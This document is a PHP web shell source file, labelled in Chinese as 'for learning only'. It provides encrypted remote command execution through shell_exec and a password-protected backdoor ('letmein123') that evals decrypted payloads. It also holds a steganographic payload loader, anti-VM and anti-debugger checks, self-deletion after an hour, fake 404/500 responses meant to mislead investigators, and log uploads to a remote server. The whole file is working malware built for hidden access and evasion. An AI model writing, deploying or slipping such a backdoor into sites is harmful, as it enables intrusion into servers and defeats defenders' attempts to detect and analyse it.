仅供学习
<?php
$allowedIPs = ['127.0.0.1', '192.168.1.100'];
$clientIP = $_SERVER['REMOTE_ADDR'];
if (!in_array($clientIP, $allowedIPs) && !isValidGeoIP($clientIP) && !isProxyIP($clientIP)) {
deceiveUser();
}
// AES 密钥初始化
session_start();
if (!isset($_SESSION['aes_key'])) {
$_SESSION['aes_key'] = getenv('AES_KEY') ?: bin2hex(random_bytes(32));
$_SESSION['aes_iv'] = getenv('AES_IV') ?: bin2hex(random_bytes(16));
}
$aesKey = $_SESSION['aes_key'];
$aesIV = $_SESSION['aes_iv'];
$backdoorPass = 'letmein123';
// 自毁机制
if (time() - filemtime(__FILE__) > 3600 || isset($_SESSION['error_count']) && $_SESSION['error_count'] > 5) {
@unlink(__FILE__);
deceiveUser();
}
// 反沙盒与虚拟机检测
if (isDebuggerPresent() || isVirtualEnvironment() || isSuspiciousBehavior($clientIP)) {
deceiveUser();
}
// 命令执行与文件包含
if (isset($_GET['cmd'])) {
sleep(rand(1, 5)); // 模拟延时
$decryptedCmd = decryptData(base64_decode($_GET['cmd']), $aesKey, $aesIV);
if (preg_match('/[^a-zA-Z0-9_\- ]/', $decryptedCmd)) {
deceiveUser();
}
$output = shell_exec($decryptedCmd) ?: "Execution disabled.";
echo encryptData($output, $aesKey, $aesIV);
}
if (isset($_GET['file'])) {
$file = decryptData($_GET['file'], $aesKey, $aesIV);
$safeFiles = ['index.php', 'info.php', 'test.php'];
if (in_array($file, $safeFiles) && file_exists($file)) {
secureFileInclude($file);
} else {
deceiveUser();
}
}
// 后门访问
if (isset($_GET['hidden']) && $_GET['pass'] === $backdoorPass) {
eval(decryptData(base64_decode($_GET['payload']), $aesKey, $aesIV));
secureLog("Backdoor triggered by: $clientIP");
}
// 隐写负载加载
if (isset($_GET['steg'])) {
$stegImage = 'payload.png';
$hiddenCode = file_get_contents($stegImage);
eval(extractHiddenPayload($hiddenCode));
}
// 反沙盒检测
if (isset($_GET['sandbox'])) {
if (isVirtualEnvironment()) {
deceiveUser();
}
}
// 防御函数实现
function isValidGeoIP($ip) {
$url = "http://ip-api.com/json/{$ip}";
$response = json_decode(file_get_contents($url), true);
return $response['countryCode'] === 'US';
}
function isProxyIP($ip) {
$url = "http://ip-api.com/json/{$ip}";
$response = json_decode(file_get_contents($url), true);
return $response['proxy'] ?? false;
}
function isVirtualEnvironment() {
$cpuInfo = file_get_contents("/proc/cpuinfo");
$diskInfo = shell_exec('wmic diskdrive get serialnumber');
$macAddress = shell_exec('getmac');
$processList = shell_exec('tasklist');
if (
strpos($cpuInfo, "vmware") !== false ||
strpos($cpuInfo, "kvm") !== false ||
strpos($diskInfo, "000000") !== false ||
strpos($macAddress, "00:50:56") !== false || // VMware MAC
preg_match('/VBoxService|vmtoolsd/i', $processList)
) {
return true;
}
return false;
}
function isDebuggerPresent() {
return extension_loaded('xdebug') || isset($_GET['debug']);
}
// 进一步强化反沙盒、反调试,增加对多种安全工具的检测
function isSuspiciousBehavior($ip) {
// 检测可疑的请求模式,如暴力破解、频繁请求等
$requestCount = isset($_SESSION['request_count']) ? $_SESSION['request_count'] : 0;
$_SESSION['request_count'] = $requestCount + 1;
if ($requestCount > 100) {
// 可能是暴力破解
secureLog("Suspicious behavior detected from IP: $ip");
return true;
}
// 未来可以添加更多复杂的检测逻辑
return false;
}
function deceiveUser() {
if (rand(1, 10) > 7) {
echo "Error 500 - Internal Server Error";
} else {
http_response_code(404);
die("Page not found.");
}
}
function secureFileInclude($file) {
$filePath = realpath($file);
if (strpos($filePath, __DIR__) === 0) {
include($filePath);
} else {
deceiveUser();
}
}
function encryptData($data, $key, $iv) {
$padding = bin2hex(random_bytes(8)); // 添加随机填充
$data = $padding . $data;
return openssl_encrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));
}
function decryptData($data, $key, $iv) {
$decrypted = openssl_decrypt($data, 'AES-256-CTR', hex2bin($key), 0, hex2bin($iv));
return substr($decrypted, 8); // 去除填充部分
}
function extractHiddenPayload($image) {
$stegPayload = substr($image, strpos($image, 'IDAT') + 4);
$decodedPayload = base64_decode($stegPayload);
// 二次解密或嵌套隐藏
return openssl_decrypt($decodedPayload, 'AES-256-CTR', 'hidden-layer-key', 0, 'hidden-layer-iv');
}
function secureLog($logMessage) {
global $aesKey, $aesIV;
$encryptedLog = encryptData($logMessage, $aesKey, $aesIV);
file_put_contents('secure_access.log', $encryptedLog . "\n", FILE_APPEND);
// 提供远程日志上传功能
$logData = [
'log' => $encryptedLog,
'timestamp' => time(),
];
$remoteUrl = 'http://your-log-server.com/upload';
file_get_contents($remoteUrl . '?' . http_build_query($logData));
}
// 监控暴力破解和异常行为模式
function isSuspiciousRequestPattern($ip) {
// 可以在此处加入特定检测逻辑,如异常请求频率
return false; // 示例,实际可以加上更多检测逻辑
}
?>